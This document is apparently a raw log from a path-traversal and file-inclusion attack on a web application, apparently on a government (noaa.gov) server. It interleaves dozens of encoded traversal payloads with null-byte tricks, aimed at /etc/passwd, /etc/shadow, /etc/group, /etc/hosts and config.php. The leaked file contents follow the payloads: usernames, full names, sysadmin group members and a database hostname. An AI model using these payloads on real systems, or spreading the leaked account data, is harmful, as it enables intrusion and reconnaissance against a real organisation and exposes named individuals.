  3300. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3301. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3302. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3303. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
  3304. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3305. ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
  3306. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3307. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3308. <b>Query Used: ..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.php</b>root:x:0:0:root:/root:/bin/bash
  3309. bin:x:1:1:bin:/bin:/sbin/nologin
  3310. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3311. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3312. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3313. sync:x:5:0:sync:/sbin:/bin/sync
  3314. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3315. halt:x:7:0:halt:/sbin:/sbin/halt
  3316. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3317. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3318. operator:x:11:0:operator:/root:/sbin/nologin
  3319. games:x:12:100:games:/usr/games:/sbin/nologin
  3320. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3321. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3322. nobody:x:99:99:Nobody:/:/sbin/nologin
  3323. dbus:x:81:81:System message bus:/:/sbin/nologin
  3324. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3325. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3326. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3327. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3328. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3329. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3330. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3331. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3332. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3333. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3334. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3335. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3336. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3337. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3338. tcpdump:x:72:72::/:/sbin/nologin
  3339. cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
  3340. darnold:x:501:501:darnold:/home/darnold:/bin/bash
  3341. kmars:x:503:503:kmars:/home/kmars:/bin/bash
  3342. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3343. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3344. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3345. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3346. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3347. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3348. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3349. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
  3350. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3351. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3352. <b>Query Used: /&apos;%00.php</b>.<b>Query Used: /\,%ENV\,/%00.php</b>.<b>Query Used: /etc/passwd%00.php</b>.<b>Query Used: /etc/passwd%00.php</b>.<b>Query Used: /.....%0a%00.php</b>.<b>Query Used: /%2A%00.php</b>.<b>Query Used: /etc/passwd%00.php</b>root:x:0:0:root:/root:/bin/bash
  3353. bin:x:1:1:bin:/bin:/sbin/nologin
  3354. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3355. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3356. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3357. sync:x:5:0:sync:/sbin:/bin/sync
  3358. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3359. halt:x:7:0:halt:/sbin:/sbin/halt
  3360. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3361. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3362. operator:x:11:0:operator:/root:/sbin/nologin
  3363. games:x:12:100:games:/usr/games:/sbin/nologin
  3364. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3365. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3366. nobody:x:99:99:Nobody:/:/sbin/nologin
  3367. dbus:x:81:81:System message bus:/:/sbin/nologin
  3368. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3369. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3370. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3371. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3372. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3373. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3374. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3375. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3376. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3377. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3378. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3379. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3380. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3381. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3382. tcpdump:x:72:72::/:/sbin/nologin
  3383. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  3384. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  3385. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  3386. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3387. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3388. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3389. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3390. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3391. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3392. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
  3393. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3394. ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
  3395. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3396. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3397. <b>Query Used: ..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2f..%2f%2fetc%2f%2fpasswd%00.php</b>root:x:0:0:root:/root:/bin/bash
  3398. bin:x:1:1:bin:/bin:/sbin/nologin
  3399. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3400. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3401. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3402. sync:x:5:0:sync:/sbin:/bin/sync
  3403. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3404. halt:x:7:0:halt:/sbin:/sbin/halt
  3405. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3406. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3407. operator:x:11:0:operator:/root:/sbin/nologin
  3408. games:x:12:100:games:/usr/games:/sbin/nologin
  3409. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3410. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3411. nobody:x:99:99:Nobody:/:/sbin/nologin
  3412. dbus:x:81:81:System message bus:/:/sbin/nologin
  3413. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3414. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3415. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3416. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3417. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3418. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3419. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3420. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3421. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3422. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3423. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3424. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3425. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3426. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3427. tcpdump:x:72:72::/:/sbin/nologin
  3428. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  3429. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  3430. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  3431. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3432. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3433. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3434. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3435. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3436. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3437. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
  3438. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3439. ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
  3440. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3441. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3442. <b>Query Used: /etc/passwd^^%00.php</b>.<b>Query Used: /etc/group%00.php</b>root:x:0:root
  3443. bin:x:1:root,bin,daemon
  3444. daemon:x:2:root,bin,daemon
  3445. sys:x:3:root,bin,adm
  3446. adm:x:4:root,adm,daemon
  3447. tty:x:5:
  3448. disk:x:6:root
  3449. lp:x:7:daemon,lp
  3450. mem:x:8:
  3451. kmem:x:9:
  3452. wheel:x:10:root
  3453. mail:x:12:mail,postfix
  3454. uucp:x:14:uucp
  3455. man:x:15:
  3456. games:x:20:
  3457. gopher:x:30:
  3458. video:x:39:
  3459. dip:x:40:
  3460. ftp:x:50:
  3461. lock:x:54:
  3462. audio:x:63:
  3463. nobody:x:99:
  3464. users:x:100:
  3465. dbus:x:81:
  3466. utmp:x:22:
  3467. utempter:x:35:
  3468. floppy:x:19:
  3469. vcsa:x:69:
  3470. rpc:x:32:
  3471. abrt:x:499:
  3472. cdrom:x:11:
  3473. tape:x:33:
  3474. dialout:x:18:
  3475. saslauth:x:498:
  3476. mailnull:x:47:
  3477. smmsp:x:51:
  3478. haldaemon:x:68:haldaemon
  3479. ntp:x:38:
  3480. rpcuser:x:29:
  3481. nfsnobody:x:65534:
  3482. apache:x:48:
  3483. webalizer:x:67:
  3484. sshd:x:74:
  3485. postdrop:x:90:
  3486. postfix:x:89:
  3487. tcpdump:x:72:
  3488. slocate:x:21:
  3489. stapdev:x:497:
  3490. stapusr:x:496:
  3491. sysadmin:x:401:cmccan,kmars,darnold,mstrydom,nscanner
  3492. cmccan:x:500:
  3493. darnold:x:501:
  3494. kmars:x:503:
  3495. zabbix:x:309:
  3496. clamav:x:311:
  3497. clamupdate:x:312:
  3498. clam:x:308:
  3499. cgred:x:504:
  3500. mstrydom:x:533:
  3501. forecast:x:302:
  3502. ahps:x:303:
  3503. nwschat:x:320:
  3504. nscanner:x:424:
  3505. memcached:x:301:
  3506. stapsys:x:157:
  3507. <b>Query Used: \\\\\\\etc/\passwd%00.php</b>.<b>Query Used: /etc/shadow^^%00.php</b>.<b>Query Used: /bin/id|%00.php</b>.<b>Query Used: ././././././etc//passwd%00.php</b>.<b>Query Used: /..\..\..\..\..\..\etc/passwd%00.php</b>.<b>Query Used: /..\..\..\..\..\..\etc/shadow%00.php</b>.<b>Query Used: \.\.\.\.\.\.\etc/\passwd%00.php</b>.<b>Query Used: /./././././././././././etc/passwd%00.php</b>.<b>Query Used: /./././././././././././etc/shadow%00.php</b>.<b>Query Used: /./././././././././././etc/group%00.php</b>.<b>Query Used: ......etc/passwd%00.php</b>.<b>Query Used: \.\.\.\.\.\.\.\.\etc\passwd%00.php</b>.<b>Query Used: \.\.\.\.\.\.\.\.\etc\group%00.php</b>.<b>Query Used: /%00//%00//%00//%00//%00/etc/passwd%00.php</b><b>Query Used: /%00//%00//%00//%00//%00/etc/passwd%00.php</b><b>Query Used: /%00//%00//%00//%00//%00//etc//shadow%00.php</b><b>Query Used: /%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc/passwd%00.php</b>.<b>Query Used: /%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc/shadow%00.php</b>.<b>Query Used: ..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63%00.php</b>.<b>Query Used: ..%%35c..%%35c..%%35c..%%35c..%%35c..%%35c%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63etc%25%35%63passwd%00.php</b>.<b>Query Used: ..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cgroup%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cshadow%00.php</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qf%00.php</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfpasswd%00.php</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc%bg%qfgroup%00.php</b>.<b>Query Used: ..%bg%qf..%bg%qf..%bg%qf..%bg%qfetc/passwd%00.php</b>.<b>Query Used: \.\.\.\.\.\.etc/passwd%00.php</b>.<b>Query Used: etc/passwd%00.php</b>.<b>Query Used: etc/shadow%00.php</b>.<b>Query Used: %00.php</b>.<b>Query Used: %00.php</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215%00.php</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd%00.php</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215shadow%00.php</b>.<b>Query Used: .%5c..%5c/..%c0%9v..%5c.%5c..%5c/..%c0%9v%00.php</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215group%00.php</b>.<b>Query Used: ..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd%00.php</b>.<b>Query Used: ..%255c%00.php</b>.<b>Query Used: .%5c..%5c%00.php</b>.<b>Query Used: /..%c0%9v%00.php</b>.<b>Query Used: /%00.php</b>.<b>Query Used: /..%255c..%255c%00.php</b>.<b>Query Used: ///%00.php</b>.<b>Query Used: /..%255c..%255c/..%255c..%255c/..%255c..%255c%00.php</b>.<b>Query Used: ..%255c%00.php</b>.<b>Query Used: .%5c..%5c/..%c0%9v%00.php</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216passwd%00.php</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216hosts%00.php</b>.<b>Query Used: ..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216shadow%00.php</b>.<b>Query Used: ./\./\./\./\./\./\./etc/hosts%00.php</b>.<b>Query Used: \./\./\./\./\./\./\etc/\passwd%00.php</b>.<b>Query Used: \./\./\./\./\./\./\proc/\self/ d/%00.php</b>.<b>Query Used: /////config.php%00.php</b>.<b>Query Used: ..\/..\/..\/..\/config.php%00.php</b>.<b>Query Used: ..%5c..%5c..%5c..%5c..%5c..%5c..%5config.php%00.php</b>.<b>Query Used: config.php%00.php</b>.<b>Query Used: ..%25%35%63..%25%35%63..%25%35%63config.php%00.php</b>.<b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2econfig.php%00.php</b>.<b>Query Used: %00.php.inc</b><b>Query Used: etc/hosts%00.php.inc</b>127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
  3508. ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
  3509. <b>Query Used: etc/passwd%00.php.inc</b>root:x:0:0:root:/root:/bin/bash
  3510. bin:x:1:1:bin:/bin:/sbin/nologin
  3511. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3512. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3513. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3514. sync:x:5:0:sync:/sbin:/bin/sync
  3515. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3516. halt:x:7:0:halt:/sbin:/sbin/halt
  3517. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3518. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3519. operator:x:11:0:operator:/root:/sbin/nologin
  3520. games:x:12:100:games:/usr/games:/sbin/nologin
  3521. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3522. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3523. nobody:x:99:99:Nobody:/:/sbin/nologin
  3524. dbus:x:81:81:System message bus:/:/sbin/nologin
  3525. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3526. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3527. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3528. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3529. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3530. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3531. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3532. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3533. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3534. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3535. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3536. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3537. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3538. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3539. tcpdump:x:72:72::/:/sbin/nologin
  3540. cmccan:x:500:500:Chad McCan:/home/cmccan:/bin/bash
  3541. darnold:x:501:501:Dan Arnold:/home/darnold:/bin/bash
  3542. kmars:x:503:503:Kolly Mars:/home/kmars:/bin/bash
  3543. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3544. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3545. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3546. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3547. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3548. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3549. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nolo
  3550. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3551. ndfd:x:306:306:NDFD System Account:/home/ndfd:/sbin/nologin
  3552. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3553. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3554. <b>Query Used: ..\%20\..\%20\..\%20\etc/passwd%00.php.inc</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\passwd%00.php.inc</b>.<b>Query Used: ../../../../../../../../../../etc/passwd%00.php.inc</b>.<b>Query Used: ../../../../../../../../../../etc/hosts%00.php.inc</b>.<b>Query Used: ..\..\..\..\..\..\..\..\..\..\etc\group%00.php.inc</b>.<b>Query Used: .\./.\./.\./.\./.\./.\./etc/shadow%00.php.inc</b>.<b>Query Used: /%00.php.inc</b>Array
  3555. (
  3556. [0] => Could not connect to host server: mysqlread.md.nids.noaa.gov
  3557. Too many connections
  3558. )
  3559. <b>Query Used: %00/%00.php.inc</b><b>Query Used: %2A%00.php.inc</b>.<b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.php.inc</b>root:x:0:0:root:/root:/bin/bash
  3560. bin:x:1:1:bin:/bin:/sbin/nologin
  3561. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3562. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3563. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3564. sync:x:5:0:sync:/sbin:/bin/sync
  3565. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3566. halt:x:7:0:halt:/sbin:/sbin/halt
  3567. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3568. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3569. operator:x:11:0:operator:/root:/sbin/nologin
  3570. games:x:12:100:games:/usr/games:/sbin/nologin
  3571. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3572. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3573. nobody:x:99:99:Nobody:/:/sbin/nologin
  3574. dbus:x:81:81:System message bus:/:/sbin/nologin
  3575. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3576. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3577. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3578. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3579. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3580. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3581. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3582. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3583. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3584. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3585. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3586. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3587. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3588. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3589. tcpdump:x:72:72::/:/sbin/nologin
  3590. cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
  3591. darnold:x:501:501:darnold:/home/darnold:/bin/bash
  3592. kmars:x:503:503:kmars:/home/kmars:/bin/bash
  3593. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3594. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3595. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3596. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3597. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3598. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3599. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3600. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
  3601. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3602. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3603. <b>Query Used: /////etc/passwd%00.php.inc</b>root:x:0:0:root:/root:/bin/bash
  3604. bin:x:1:1:bin:/bin:/sbin/nologin
  3605. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  3606. adm:x:3:4:adm:/var/adm:/sbin/nologin
  3607. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  3608. sync:x:5:0:sync:/sbin:/bin/sync
  3609. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  3610. halt:x:7:0:halt:/sbin:/sbin/halt
  3611. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  3612. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  3613. operator:x:11:0:operator:/root:/sbin/nologin
  3614. games:x:12:100:games:/usr/games:/sbin/nologin
  3615. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  3616. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  3617. nobody:x:99:99:Nobody:/:/sbin/nologin
  3618. dbus:x:81:81:System message bus:/:/sbin/nologin
  3619. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  3620. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  3621. abrt:x:499:499::/etc/abrt:/sbin/nologin
  3622. saslauth:x:498:498:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  3623. mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  3624. smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  3625. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  3626. ntp:x:38:38::/etc/ntp:/sbin/nologin
  3627. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  3628. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  3629. apache:x:48:48:Apache:/var/www:/sbin/nologin
  3630. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  3631. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  3632. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  3633. tcpdump:x:72:72::/:/sbin/nologin
  3634. cmccan:x:500:500:cmccan:/home/cmccan:/bin/bash
  3635. darnold:x:501:501:darnold:/home/darnold:/bin/bash
  3636. kmars:x:503:503:kmars:/home/kmars:/bin/bash
  3637. zabbix:x:309:309:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
  3638. clamav:x:311:311:Clamav scanner user:/home/clamav:/sbin/nologin
  3639. clamupdate:x:312:312:Clamav database update user:/var/lib/clamav:/sbin/nologin
  3640. clam:x:308:308:Clam Anti Virus Checker:/var/clamav:/sbin/nologin
  3641. mstrydom:x:533:533:Malcolm Strydom:/home/mstrydom:/bin/bash
  3642. forecast:x:302:302:Forecast System Account:/vol/forecast:/sbin/nologin
  3643. ahps:x:303:303:AHPS System Account:/vol/ahps:/sbin/nologin
  3644. nwschat:x:320:320:NWSChat System Account:/home/nwschat:/sbin/nologin
  3645. nscanner:x:424:424:Nessus Scanner:/home/nscanner:/bin/bash
  3646. memcached:x:301:301:Memcached daemon:/var/run/memcached:/sbin/nologin
  3647. <b>Query Used: /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/group%00.php.inc</b>root:x:0:root
  3648. bin:x:1:root,bin,daemon
  3649. daemon:x:2:root,bin,daemon
  3650. sys:x:3:root,bin,adm
  3651. adm:x:4:root,adm,daemon
  3652. tty:x:5:
  3653. disk:x:6:root
  3654. lp:x:7:daemon,lp
  3655. mem:x:8:
  3656. kmem:x:9:
  3657. wheel:x:10:root
  3658. mail:x:12:mail,postfix
  3659. uucp:x:14:uucp
  3660. man:x:15:
  3661. games:x:20:
  3662. gopher:x:30:
  3663. video:x:39:
  3664. dip:x:40:
  3665. ftp:x:50:
  3666. lock:x:54:
  3667. audio:x:63:
  3668. nobody:x:99:
  3669. users:x:100:
  3670. dbus:x:81:
  3671. utmp:x:22:
  3672. utempter:x:35:
  3673. floppy:x:19:
  3674. vcsa:x:69:
  3675. rpc:x:32:
  3676. abrt:x:499:
  3677. cdrom:x:11:
  3678. tape:x:33:
  3679. dialout:x:18:
  3680. saslauth:x:498:
  3681. mailnull:x:47:
  3682. smmsp:x:51:
  3683. haldaemon:x:68:haldaemon
  3684. ntp:x:38:
  3685. rpcuser:x:29:
  3686. nfsnobody:x:65534:
  3687. apache:x:48:
  3688. webalizer:x:67:
  3689. sshd:x:74:
  3690. postdrop:x:90:
  3691. postfix:x:89:
  3692. tcpdump:x:72:
  3693. slocate:x:21:
